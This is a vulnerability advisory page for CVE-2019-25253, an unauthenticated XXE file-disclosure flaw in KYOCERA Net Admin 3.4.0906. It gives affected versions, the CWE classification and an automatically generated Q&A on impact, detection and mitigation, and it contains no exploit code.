CVE-2019-25253
XXE Injection in KYOCERA Net Admin Allows Arbitrary File Access
Publication date: 2025-12-24
Last updated on: 2025-12-24
Assigner: VulnCheck
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| kyocera | net_admin | 3.4.0906 |
| apache | tomcat | 8.5.15 |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-611 | The product processes an XML document that can contain XML entities with URIs that resolve to documents outside of the intended sphere of control, causing the product to embed incorrect documents into its output. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
This vulnerability is an XML External Entity (XXE) injection in the KYOCERA Net Admin 3.4.0906 Multi-Set Template Editor. It occurs because the software improperly sanitizes XML input, allowing an attacker to craft a malicious XML file with external entity references. When processed, this malicious XML can cause the application to read arbitrary files from the system and send their contents to an attacker-controlled server via an out-of-band HTTP channel, without requiring authentication. [1, 2]
How can this vulnerability impact me? :
This vulnerability can lead to unauthorized disclosure of sensitive system files and configuration data, such as database credentials. Attackers can exploit it remotely without authentication to exfiltrate sensitive information, potentially compromising the security of the network and devices managed by KYOCERA Net Admin. This poses a significant security risk to administrators and organizations relying on this software for device management. [1, 2]
How can this vulnerability be detected on my network or system? Can you suggest some commands?
Detection of this vulnerability involves monitoring for malicious XML files targeting the Multi-Set Template Editor, especially those containing external entity references or DOCTYPE declarations that load remote DTDs. Network detection can include inspecting outbound HTTP requests for unusual traffic to unknown external servers, which may indicate out-of-band data exfiltration attempts. On the system, checking for suspicious XML files processed by kmmted.exe or monitoring the execution of the Multi-Set Template Editor executable and its ActiveX component for anomalous behavior can help. Specific commands are not provided in the resources, but general approaches include using network traffic analysis tools (e.g., Wireshark) to detect unusual HTTP requests and file integrity monitoring to detect crafted XML files. [1, 2]
What immediate steps should I take to mitigate this vulnerability?
Immediate mitigation steps include restricting access to the Multi-Set Template Editor, especially limiting who can upload or process XML files. Network-level controls such as blocking outbound HTTP requests to untrusted external servers can prevent data exfiltration. Applying any available patches or updates from KYOCERA is recommended, although no vendor response was noted in the advisory. Additionally, disabling or restricting the use of the vulnerable ActiveX component (MultisetTemplateEditorActiveXComponent.dll) and monitoring for suspicious activity related to kmmted.exe can reduce risk. [1, 2]
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:
This vulnerability allows unauthenticated attackers to read arbitrary system files and retrieve sensitive configuration data such as database credentials. Such unauthorized disclosure of sensitive information could lead to non-compliance with data protection standards and regulations like GDPR and HIPAA, which require safeguarding sensitive data against unauthorized access. Therefore, exploitation of this vulnerability may result in violations of these compliance requirements due to exposure of confidential information. [1, 2]